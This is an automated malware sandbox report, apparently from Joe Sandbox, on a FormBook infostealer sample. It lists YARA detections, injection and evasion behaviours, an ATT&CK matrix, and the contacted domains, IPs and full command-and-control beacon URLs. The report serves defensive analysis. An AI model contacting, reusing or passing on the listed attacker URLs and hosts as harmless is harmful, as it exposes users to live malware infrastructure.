          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502325 Sample: 2u2u8wnrrW.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.fleetton.com 2->31 33 www.24000words.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 6 other signatures 2->47 11 2u2u8wnrrW.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\2u2u8wnrrW.exe.log, ASCII 11->29 dropped 59 Tries to detect virtualization through RDTSC time measurements 11->59 61 Injects a PE file into a foreign processes 11->61 15 2u2u8wnrrW.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 seal-brother.com 59.106.13.53, 49810, 80 SAKURA-BSAKURAInternetIncJP Japan 18->35 37 a.mb.cn 8.212.24.67, 49836, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 18->37 39 9 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 chkdsk.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2u2u8wnrrW.exe17%VirustotalBrowse

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.2u2u8wnrrW.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          www.esyscoloradosprings.com/fqiq/0%Avira URL Cloudsafe
          http://www.driventow.com/fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.kangrungao.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg==0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.seal-brother.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg==0%Avira URL Cloudsafe
          http://www.healthyweekendtips.com/fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.satellitephonstore.com/fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.esyscoloradosprings.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          seal-brother.com
          		59.106.13.53
          		truetrue
            		unknown
            driventow.com
            		34.102.136.180
            		truefalse
              		unknown
              www.fleetton.com
              		44.227.65.245
              		truefalse
                		unknown
                www.24000words.com
                		156.240.150.22
                		truefalse
                  		unknown
                  www.satellitephonstore.com
                  		35.186.238.101
                  		truefalse
                    		unknown
                    www.healthyweekendtips.com
                    		172.67.216.2
                    		truetrue
                      		unknown
                      websites076.homestead.com
                      		108.167.135.122
                      		truefalse
                        		high
                        a.mb.cn
                        		8.212.24.67
                        		truetrue
                          		unknown
                          www.esyscoloradosprings.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.seal-brother.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.govindfinance.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.kangrungao.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.driventow.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    www.esyscoloradosprings.com/fqiq/true
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.driventow.com/fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kXfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.kangrungao.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.seal-brother.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg==true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.healthyweekendtips.com/fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kXtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.satellitephonstore.com/fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kXfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.esyscoloradosprings.com/fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw==true
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.02u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersG2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/?2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/bThe2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers?2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.tiro.com2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.goodfont.co.kr2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.collada.org/2005/11/COLLADASchema9Done2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.coml2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sajatypeworks.com2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.typography.netD2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlN2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/cThe2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htm2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fontfabrik.com2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cn2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/frere-jones.html2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.jiyu-kobo.co.jp/2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/DPlease2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers82u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.fonts.com2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.sandoll.co.kr2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.urwpp.deDPlease2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cn2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sakkal.com2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          35.186.238.101
                                                          		www.satellitephonstore.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          172.67.216.2
                                                          		www.healthyweekendtips.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          108.167.135.122
                                                          		websites076.homestead.comUnited States
                                                          		46606UNIFIEDLAYER-AS-1USfalse
                                                          59.106.13.53
                                                          		seal-brother.comJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                          34.102.136.180
                                                          		driventow.comUnited States
                                                          		15169GOOGLEUSfalse
                                                          8.212.24.67
                                                          		a.mb.cnSingapore
                                                          		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:502325
                                                          Start date:13.10.2021
                                                          Start time:19:57:11
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 5s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:2u2u8wnrrW.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:23
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@9/6
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 7.3% (good quality ratio 6.5%)
                                                          • Quality average: 71.2%
                                                          • Quality standard deviation: 32.6%
                                                          HCA Information:
                                                          • Successful, ratio: 99%
                                                          • Number of executed functions: 94
                                                          • Number of non-executed functions: 152
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 51.11.168.232, 20.49.150.241, 20.82.209.183, 131.253.33.200, 13.107.22.200, 95.100.218.79, 20.50.102.62, 67.27.157.126, 8.253.95.249, 8.248.145.254, 67.26.137.254, 8.248.141.254, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33, 95.100.216.89
                                                          • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          19:58:22API Interceptor2x Sleep call for process: 2u2u8wnrrW.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          108.167.135.122divpCHa0h7.exeGet hashmaliciousBrowse
                                                          • www.esyscoloradosprings.com/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS
                                                          59.106.13.53ClgNlmU3Is.exeGet hashmaliciousBrowse
                                                          • www.seal-brother.com/fqiq/?Hb08=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7sZO9vcU+qRF0rgQ==&s6=z484
                                                          8.212.24.67yUcgVSbRpP.exeGet hashmaliciousBrowse
                                                          • www.kangrungao.com/fqiq/?JFN=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg==&Uf6ls=XXxpd
                                                          TransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                                          • www.haohuatour.com/mxnu/?3fOLUv=jxo8s6XXOThdt&bBKddT=a94ljE1i5ptZPAeSV5swX9cLh4HrwEugtwj03e18BSHIybXdid6BUGjnp2BXTPrQ29cErQ==
                                                          Quote -0071021.exeGet hashmaliciousBrowse
                                                          • www.arcaderacinggame.com/mg0t/?UhZH=C3JgNGU1F5WuL5sDksmQG79ER6I31vstbJgRxoyXYkPC6tSPRGgFBOe65HDWmOWmykSS&RzutZ4=0pFdJ25pDHMtU
                                                          7ZU9e28pVT.exeGet hashmaliciousBrowse
                                                          • www.kangrungao.com/vngb/?bp=PTXlpz/VV/JqlypQPA+vD+8jK7CmhjJXyzWWNqvvqYrDmtbN3MPVaP2jLBK34S/159jn&RFN=s48l4Pqx2H_t

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          a.mb.cndivpCHa0h7.exeGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          yUcgVSbRpP.exeGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          TransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          Quote -0071021.exeGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          7ZU9e28pVT.exeGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          CT2keP53T3.exeGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                          • 8.212.24.67
                                                          PI. NO. 13420 CONFIRMATION BANK DETAILS_pdf.exeGet hashmaliciousBrowse
                                                          • 47.75.37.155
                                                          www.24000words.combGOw6FuOUA.exeGet hashmaliciousBrowse
                                                          • 156.240.150.22
                                                          websites076.homestead.comClgNlmU3Is.exeGet hashmaliciousBrowse
                                                          • 108.167.135.122
                                                          divpCHa0h7.exeGet hashmaliciousBrowse
                                                          • 108.167.135.122

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          CLOUDFLARENETUSz8FnqbFMkV.exeGet hashmaliciousBrowse
                                                          • 172.67.168.153
                                                          divpCHa0h7.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          M1YceQ237E.dllGet hashmaliciousBrowse
                                                          • 104.20.185.68
                                                          BF2042.exeGet hashmaliciousBrowse
                                                          • 162.159.134.233
                                                          SecuriteInfo.com.W32.AIDetect.malware1.10225.exeGet hashmaliciousBrowse
                                                          • 104.21.26.237
                                                          5y4jNIVnk2.exeGet hashmaliciousBrowse
                                                          • 104.21.26.237
                                                          vlF8tRNmtw.exeGet hashmaliciousBrowse
                                                          • 172.67.173.58
                                                          FTdhc25gn8.exeGet hashmaliciousBrowse
                                                          • 162.159.130.233
                                                          Paymentslip 10132021.xlsxGet hashmaliciousBrowse
                                                          • 172.67.188.154
                                                          UZlg2Sq2pQ.exeGet hashmaliciousBrowse
                                                          • 104.21.17.130
                                                          Revised_Purchase_Order.htmGet hashmaliciousBrowse
                                                          • 172.67.219.206
                                                          Qoutation013-10.exeGet hashmaliciousBrowse
                                                          • 172.67.188.154
                                                          app.exeGet hashmaliciousBrowse
                                                          • 172.67.141.50
                                                          xL8pl6m3UZ.exeGet hashmaliciousBrowse
                                                          • 172.67.188.154
                                                          Halkbank_Ekstre_20211310_082357_541079.exeGet hashmaliciousBrowse
                                                          • 162.159.135.233
                                                          ATT10821.htmlGet hashmaliciousBrowse
                                                          • 104.19.142.111
                                                          txYTweyXZ0Get hashmaliciousBrowse
                                                          • 1.1.3.1
                                                          AWB # 2617429350,pdf.exeGet hashmaliciousBrowse
                                                          • 172.67.188.154
                                                          ek3dgxlAe0.exeGet hashmaliciousBrowse
                                                          • 172.67.188.154
                                                          REMITTANCE-54324.exeGet hashmaliciousBrowse
                                                          • 104.21.19.200
                                                          UNIFIEDLAYER-AS-1USClgNlmU3Is.exeGet hashmaliciousBrowse
                                                          • 74.220.199.6
                                                          divpCHa0h7.exeGet hashmaliciousBrowse
                                                          • 108.167.135.122
                                                          Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                          • 69.49.234.122
                                                          Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                          • 69.49.234.122
                                                          Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                          • 69.49.234.122
                                                          SecureMessage.docGet hashmaliciousBrowse
                                                          • 192.185.37.229
                                                          Jrsuarez-62643-5799-80-950985.HTMGet hashmaliciousBrowse
                                                          • 69.49.234.122
                                                          Farbestfoods.AP Summary.2752.htmlGet hashmaliciousBrowse
                                                          • 192.185.114.115
                                                          SURRENDED HBL CNSBIF0825FT.exeGet hashmaliciousBrowse
                                                          • 192.254.180.165
                                                          PO#13ORDER PDF.exeGet hashmaliciousBrowse
                                                          • 162.241.244.46
                                                          ORDER.vbsGet hashmaliciousBrowse
                                                          • 192.185.95.74
                                                          art-1881052385.xlsGet hashmaliciousBrowse
                                                          • 108.179.232.85
                                                          art-1881052385.xlsGet hashmaliciousBrowse
                                                          • 108.179.232.85
                                                          AWB 94000302-2391.exeGet hashmaliciousBrowse
                                                          • 192.185.84.191
                                                          Doc-CS3.exeGet hashmaliciousBrowse
                                                          • 192.185.105.182
                                                          SecuriteInfo.com.Artemis7FC3D3787CC9.2543.exeGet hashmaliciousBrowse
                                                          • 162.214.50.135
                                                          ORD2021100866752371AC.exeGet hashmaliciousBrowse
                                                          • 192.185.48.225
                                                          UaBxIF11A6Get hashmaliciousBrowse
                                                          • 173.254.28.91
                                                          zHlu1BJnIr.exeGet hashmaliciousBrowse
                                                          • 192.185.168.209
                                                          doc-379851424.xlsGet hashmaliciousBrowse
                                                          • 108.179.242.179

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2u2u8wnrrW.exe.log
